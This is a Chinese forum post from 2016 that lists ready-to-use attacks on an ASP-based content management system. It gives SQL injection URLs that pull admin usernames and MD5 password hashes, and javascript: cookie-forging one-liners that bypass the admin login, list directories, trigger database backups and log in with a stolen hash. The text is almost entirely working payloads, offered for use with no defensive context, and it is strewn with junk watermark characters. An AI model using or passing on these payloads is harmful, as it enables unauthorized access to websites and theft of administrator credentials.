一、注入" B" F- E0 I* k: K, }- ^. U" v
1、news_more.asp?lm=2 %41nd 1=2 union %53elect 1,2,3,0x3b%26user,0x3b%26pass,6,7,8 %46rom %41dmin union %53elect * %46rom lm where 1=2
e1 ^% q+ L: F# f$ m- ^% A: N. F, O7 S' i& Q4 i
2、第一步:javascript:alert(document.cookie="adminuser=admin");alert(document.cookie="admindj=1");location.href="admin_chk.asp" 1 }6 C( a; a9 c; T1 Y
第二步:请求:admin_lm_edit.asp?id=1 %41nd 1=2 union %53elect 1,2,3,4,id%260x3b%26user%260x3b%26pass,6,7,8%20%46rom%20%41dmin
' `5 \9 V/ I: e; m- [, [) c可得到用户名和MD5加密码的密码。) z8 d* n6 \, W+ G) m B% H
. m- u" P9 r; m. j二、cookies欺骗+ }" d# W$ U5 A# _, o8 F
+ ^/ ?, \8 U; K- J5 M% B
1、直接进后台,适用于较低版本,一般login.asp和admin_index.asp在同一目录下的版本有此漏洞. / r* B$ B% F% Q. v7 P
javascript:alert(document.cookie="adminuser="+escape("'or'='or'"));alert(document.cookie="adminpass="+escape("'or'='or'"));alert(document.cookie="admindj="+escape("1"));location.href="admin_index.asp"0 n# G4 k7 d2 p# l/ z" H1 `% N8 N* M- a
. z) Z- N( p# o- n* Y" V, F
2、列目录.
- i6 S5 o" i% ~) Gjavascript:alert(document.cookie="admindj="+escape("1"));location.href="edit/admin_uploadfile.asp?dir=.."
# o$ @9 d; ]2 L7 h
7 m" P7 C3 P+ V8 i2 m( D) F9 r3、数据库备份(适用性好像比较低.)
5 _% b) t. K+ mjavascript:alert(document.cookie="admindj="+escape("1"));location.href="admin_db_backup.asp?action=backupdata"
b8 [5 B. J; z* ]9 U9 B+ k; x8 h3 e: k0 T% ]: V$ I
4、得到MD5密码解不了密进后台方法+ x! \6 w& }; b& q, r0 S3 [
javascript:alert(document.cookie="adminuser="+escape("用户名")); alert(document.cookie="adminpass="+escape("md5密码")); alert(document.cookie="admindj="+escape("1"));location.href="admin_index.asp"
" N* i# k E# i" s6 H( ]( n |
发表于 2016-5-11 14:55:08
收藏
支持
反对